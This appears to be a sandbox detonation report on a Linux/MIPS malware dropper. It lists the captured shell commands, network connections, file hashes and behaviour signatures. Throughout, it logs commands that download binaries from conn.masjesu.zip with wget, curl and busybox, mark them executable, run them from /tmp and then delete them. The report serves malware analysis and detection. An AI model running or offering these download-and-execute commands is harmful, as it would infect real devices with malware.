[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/rm
[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/chmod
[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3
[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/rm
[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/chmod
[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/rm
[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/chmod
[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/rm
[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/chmod
[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/rm
[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/chmod
[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/rm
[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/chmod
[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/rm
[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/chmod
[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/rm
[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 01:50
Reported
2024-10-18 01:52
Platform
debian9-mipsel-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | N/A |
| N/A | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | N/A |
| N/A | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | N/A |
| N/A | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | N/A |
| N/A | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | N/A |
| N/A | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | N/A |
| N/A | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | N/A |
| N/A | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | N/A |
| N/A | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | N/A |
| N/A | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | N/A |
| N/A | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | N/A |
| N/A | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | N/A |
| N/A | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | N/A |
| N/A | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | N/A |
| N/A | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | N/A |
| N/A | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | N/A |
| N/A | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | N/A |
| N/A | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | N/A |
| N/A | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | N/A |
| N/A | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | N/A |
| N/A | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | N/A |
| N/A | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | N/A |
| N/A | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | N/A |
| N/A | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | N/A |
| N/A | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | N/A |
| N/A | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | N/A |
| N/A | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | N/A |
| N/A | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /usr/bin/curl | N/A |
